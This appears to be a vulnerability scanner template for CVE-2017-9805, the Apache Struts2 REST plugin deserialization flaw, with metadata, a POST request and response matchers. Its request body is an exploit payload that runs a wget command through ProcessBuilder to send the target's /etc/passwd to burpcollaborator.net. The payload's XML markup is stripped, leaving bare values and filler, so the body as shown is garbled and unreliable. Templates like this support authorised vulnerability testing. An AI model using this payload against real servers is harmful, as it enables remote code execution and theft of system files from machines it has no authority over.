id: CVE-2017-9805 info: name: Apache Struts2 S2-052 RCE author: pikpikcu severity: critical description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. reference: | - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html tags: cve,cve2017,apache,rce,struts requests: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" headers: Content-Type: application/xml body: | 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start

asdasd asdasd false 0 0 false false 0 matchers-condition: and matchers: - type: word words: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and - type: status status: - 500